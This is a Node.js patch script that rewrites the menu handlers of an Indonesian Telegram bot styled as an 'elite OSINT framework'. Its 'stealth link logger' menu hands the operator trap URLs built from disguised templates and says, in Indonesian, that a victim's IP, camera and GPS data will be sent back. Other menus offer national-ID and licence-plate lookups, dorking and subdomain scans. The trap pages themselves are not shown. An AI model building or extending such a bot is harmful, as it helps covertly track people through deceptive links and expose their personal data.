import fs from 'fs';
const c = fs.readFileSync('server.ts', 'utf8');
const lines = c.split('\n');

const startIdx = lines.findIndex(l => l.includes("bot.action('menu_main'"));
const endIdx = lines.findIndex(l => l.includes("bot.command('nik'"));

if (startIdx !== -1 && endIdx !== -1) {
    const newContent = [
        "    bot.action('menu_main', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>━━━━━━━ ᴛʀɪʜᴇxᴀ666 ━━━━━━━</b>\\n` +",
        "        `<b>⚔️ ᴇʟɪᴛᴇ ᴏꜱɪɴᴛ ꜰʀᴀᴍᴇᴡᴏʀᴋ ᴠ.1</b>\\n` +",
        "        `━━━━━━━━━━━━━━━━━━━━\\n\\n` +",
        "        `👋 ʜᴀʟᴏ <b>${ctx.from?.first_name || 'ᴜꜱᴇʀ'}</b>,\\n` +",
        "        `ꜱᴇʟᴀᴍᴀᴛ ᴅᴀᴛᴀɴɢ ᴅɪ ᴄᴇɴᴛᴇʀ ᴏᴘᴇʀᴀꜱɪ. sɪʟᴀʜᴋᴀɴ ᴘɪʟɪʜ ᴍᴏᴅᴜʟ ᴅɪ ʙᴀᴡᴀʜ ɪɴɪ:`;",
        "      const kb = Markup.inlineKeyboard([",
        "        [Markup.button.callback('🎣 ʟɪɴᴋ ʟᴏɢɢᴇʀ', 'menu_logger'), Markup.button.callback('📡 ᴏꜱɪɴᴛ ᴀᴅᴠ', 'menu_osint_adv')],",
        "        [Markup.button.callback('🎲 ᴍɪɴɪ ɢᴀᴍᴇꜱ', 'menu_games'), Markup.button.callback('🛠️ ᴛᴏᴏʟꜱ', 'menu_tools')],",
        "        [Markup.button.callback('🎵 ᴍᴇᴅɪᴀ', 'menu_media'), Markup.button.callback('⏰ ᴀʟᴀʀᴍ', 'menu_alarm')],",
        "        [Markup.button.callback('ℹ️ ʜᴇʟᴘ & ɪɴꜰᴏ', 'menu_help')]",
        "      ]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_logger', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const id = generateTrapId(ctx.chat!.id);",
        "      let msg = `<b>🎣 ꜱᴛᴇᴀʟᴛʜ ʟɪɴᴋ ʟᴏɢɢᴇʀ</b>\\n` +",
        "                `━━━━━━━━━━━━━━━━━━━━\\n` +",
        "                `ᴘɪʟɪʜ ᴛᴇᴍᴘʟᴀᴛᴇ ʙᴇʀɪᴋᴜᴛ ᴜɴᴛᴜᴋ ᴍᴇᴍᴜʟᴀɪ:\\n\\n`;",
        "      Object.entries(templates).forEach(([key, tmpl]) => {",
        "        const trapUrl = `${appHost.replace(/\\/$/, '')}/t/${key}/${id}`;",
        "        msg += `📦 <b>${tmpl.name}</b>\\n` +",
        "               `🔗 <code>${trapUrl}</code>\\n\\n`;",
        "      });",
        "      msg += `━━━━━━━━━━━━━━━━━━━━\\n` +",
        "             `💡 ɪɴꜰᴏ: ꜱᴇᴍᴜᴀ ᴅᴀᴛᴀ (ɪᴘ, ᴄᴀᴍ, ɢᴘꜱ) ᴀᴋᴀɴ ᴅɪᴋɪʀɪᴍ ᴋᴇ ꜱɪɴɪ.`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(msg, { parse_mode: 'HTML', link_preview_options: { is_disabled: true }, ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_osint_adv', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>📡 ᴏꜱɪɴᴛ ᴀᴅᴠᴀɴᴄᴇᴅ</b>\\n` +",
        "                  `• /nik [ɴɪᴋ]\\n` +",
        "                  `• /plat [ᴘʟᴀᴛ]\\n` +",
        "                  `• /headers [ᴜʀʟ]\\n` +",
        "                  `• /dork [ᴋᴇʏᴡᴏʀᴅ]\\n` +",
        "                  `• /subdomain [ᴅᴏᴍ]\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_games', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>🎲 ᴍɪɴɪ ɢᴀᴍᴇꜱ</b>\\n` +",
        "                  `• /khodam [ɴᴀᴍᴀ]\\n` +",
        "                  `• /tebakangka\\n` +",
        "                  `• /ramal [ɴᴀᴍᴀ]\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_tools', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>🛠️ ᴜᴛɪʟɪᴛʏ ᴛᴏᴏʟꜱ</b>\\n` +",
        "                  `• /qr [ᴛᴇᴋꜱ]\\n` +",
        "                  `• /shortlink [ᴜʀʟ]\\n` +",
        "                  `• /pwd [ᴘᴀɴᴊᴀɴɢ]\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_media', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>🎵 ᴍᴇᴅɪᴀ ᴅᴏᴡɴʟᴏᴀᴅᴇʀ</b>\\n` +",
        "                  `• /lagu [ᴊᴜᴅᴜʟ]\\n` +",
        "                  `• /play [ᴊᴜᴅᴜʟ]\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_alarm', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>⏰ ᴀʟᴀʀᴍ sʏꜱᴛᴇᴍ</b>\\n` +",
        "                  `• /alarm [ᴍᴇɴɪᴛ]\\n` +",
        "                  `• /listalarm\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        "",
        "    bot.action('menu_help', (ctx) => {",
        "      ctx.answerCbQuery().catch(() => {});",
        "      const txt = `<b>ℹ️ ɪɴꜰᴏʀᴍᴀꜱɪ</b>\\n` +",
        "                  `ʜᴏꜱᴛ: ${appHost}\\n` +",
        "                  `ꜱᴛᴀᴛᴜꜱ: ᴏɴʟɪɴᴇ\\n`;",
        "      const kb = Markup.inlineKeyboard([[Markup.button.callback('◀️ ᴋᴇᴍʙᴀʟɪ', 'menu_main')]]);",
        "      ctx.editMessageText(txt, { parse_mode: 'HTML', ...kb }).catch(() => {});",
        "    });",
        ""
    ];
    lines.splice(startIdx, endIdx - startIdx, ...newContent);
    fs.writeFileSync('server.ts', lines.join('\n'));
    console.log('Fixed server.ts');
} else {
    console.log('Markers not found', startIdx, endIdx);
}
